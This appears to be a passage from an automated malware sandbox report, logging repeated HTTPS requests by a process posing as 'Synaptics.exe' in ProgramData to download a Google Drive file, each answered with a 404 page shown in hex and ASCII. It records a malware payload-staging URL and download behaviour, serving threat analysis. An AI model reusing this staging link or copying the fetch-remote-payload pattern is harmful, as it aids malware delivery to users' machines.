                                                                                                                                                                                        2022-05-17 11:31:51 UTC488INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:51 UTC488INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        16192.168.2.349751142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:31 UTC47OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:31 UTC50INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:31 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-7j1EiDApTKiJQzL0kuDB2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:31 UTC51INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:31 UTC51INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 68 37 4e 43 57 73 6c 65 78 48 31 4e 38 39 2f 6d 64 38 6a 4d 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9h7NCWslexH1N89/md8jMw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:31 UTC53INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:31 UTC53INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        160192.168.2.349928142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:51 UTC485OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:51 UTC488INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:51 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-0AoYllqDMbxBzIRgx+iGWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:51 UTC490INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 64 39 61 6c 6f 72 79 39 79 46 42 6b 32 6d 53 54 65 2b 2b 4f 55 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="d9alory9yFBk2mSTe++OUA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:51 UTC491INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:51 UTC491INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        161192.168.2.349929142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:51 UTC491OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:51 UTC492INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:51 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-6Slt05UvUowfmF6oLZtZkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:51 UTC493INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 4c 4e 54 6c 35 46 34 55 6c 6c 6b 4c 4c 38 4c 51 64 4c 45 72 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wLNTl5F4UllkLL8LQdLErA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:51 UTC494INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:51 UTC495INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        162192.168.2.349930142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:51 UTC491OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:51 UTC495INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:51 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-JtRkWUP2xqgbNJhq0OPhVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:51 UTC496INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 33 35 6e 56 78 45 4b 45 31 30 43 64 45 36 36 7a 79 4c 79 79 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="j35nVxEKE10CdE66zyLyyw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:51 UTC497INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:51 UTC498INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        163192.168.2.349933142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:51 UTC498OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:52 UTC498INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:51 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-UKLYf3MQ8+j4yGSRhc/mhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:52 UTC499INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:52 UTC499INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 66 47 79 50 73 37 42 34 55 67 4b 2f 44 67 68 4a 52 56 4a 63 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BfGyPs7B4UgK/DghJRVJcw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:52 UTC500INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
